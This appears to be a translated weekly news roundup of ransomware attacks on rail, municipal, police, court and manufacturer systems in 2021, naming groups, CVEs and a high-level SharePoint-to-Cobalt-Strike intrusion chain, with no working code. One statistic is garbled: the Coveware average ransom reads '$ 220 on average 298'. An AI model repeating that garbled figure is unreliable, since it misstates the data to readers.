The past week was marked by a number of major cyberattacks using ransomware.
Serving Liverpool and its Merseyside metropolitan area, the Merseyrail suburban-urban high-speed rail system has been the victim of a cyberattack using the ransomware Lockbit. The ransomware operators used the email system to send employees and journalists reports of an attack called Lockbit Ransomware Attack and Data Theft.
The municipality of Whistler, British Columbia, Canada, was also targeted by a ransomware cyberattack. As a result of the attack, the network, website, e-mail and telephone systems of the municipality were disabled.
Babuk Locker operators, who attacked the Metropolitan District of Columbia Police Department (USA), threatened to release criminal investigations and disclose police informants in case of non-payment of the ransom. Hackers gained access to investigation reports, disciplinary files of police officers, documents on local organized criminal groups (OCGs), photographs of criminals and administrative records. According to the group, in total, they managed to steal more than 250 GB of data.
However, after only a few months of activity, the Babuk ransomware operators decided to end their criminal activities. On their site of leaks on the dark web, they published a short message about their intention to leave the business, since they had already achieved their goal. However, unlike other defunct ransomware groups that openly release decryption keys or even return the ransom to their victims, Babuk’s operators decided to publish the source code of their ransomware.
Operators of the ransomware REvil have deleted Apple’s stolen schemas from their data breach site for unknown reasons . The group hacked into systems of Quanta Computer (Apple’s partner) and stole blueprints for future MacBook laptops and other devices. The hackers demanded a $ 50 million ransom from Quanta Computer by April 27 and threatened to publish more than a dozen diagrams and drawings of MacBook components to the public. Quanta Computer and Apple refused to negotiate and the REvil group removed all mention of the hack and published schemes.
A security researcher using the dnwls0719 alias has discovered new versions of Dharma ransomware that add .ALNBR and .cum extensions to encrypted files.
C:UsersRemik AdministratorsourcereposBB ransomwareBB ransomwareobjDebugBB ransomware.pdbhttps://t.co/KDskhvt4AD@BleepinComputer @demonslay335 @Amigo_A_ @siri_urz @GrujaRS @raby_mr @M_Shahpasandi @petrovic082 @Jirehlov pic.twitter.com/6sTBl5yqWq
— dnwls0719 (@fbgwls245) March 31, 2020
Specialists from the company Coveware in its quarterly report noted that in the first three months of 2021 the amount of repayment required extortionate groups has increased significantly and now stands at $ 220 on average 298, while in the last three months of 2020, this figure stood at $ 154,108. One of the reasons for the growth is the increased activity of a number of ransomware groups demanding millions of dollars in bitcoins for a key to recover encrypted information.
A security researcher using the PCrisk alias discovered a new variant of Phobos ransomware that adds the .lookfornewitguy extension.
Microsoft SharePoint servers have now joined the list of network devices that ransomware groups use to infiltrate corporate networks of companies and organizations. The grouping is being tracked by experts codenamed Hello or WickrMe (due to the use of the encrypted Wickr messenger to negotiate with the victims). Hello / WickrMe attacks typically involve exploiting a vulnerability ( CVE-2019-0604 ) in Microsoft SharePoint Collaboration Servers. The problem allows attackers to take control of the SharePoint server and load the web shell to install the Cobalt Strike beacon. The beacon runs automated PowerShell scripts that ultimately download and install the latest Hello ransomware.
The ransomware group REvil attacked the judicial network of the Brazilian state of Rio Grande do Sul, encrypting files on computers, leading to the suspension of courts. In a Twitter post, representatives of the Tribunal de Justiça do Estado do Rio Grande do Sul (TJRS) notified of the incident and advised “internal users not to remotely access a computer or log into computers on the TJRS network”. The ransomware demanded $ 5 million for data recovery.
In pursuit of financial gain, cybercriminals exploited a vulnerability in the SonicWall SMA 100 Series VPN to deploy FiveHands ransomware on North American and European networks. The UNC2447 group exploited the CVE-2021-20016 vulnerability before it was patched by the manufacturer in February 2021. The same vulnerability was exploited in January 2021 to attack SonicWall’s internal systems.
QNAP customers are once again strongly encouraged to secure their network-attached storage (NAS) devices to protect against attacks by Agelocker ransomware operators targeting their data. A QNAP PSIRT spokesman said NAS devices recently compromised by AgeLocker ransomware were using outdated firmware.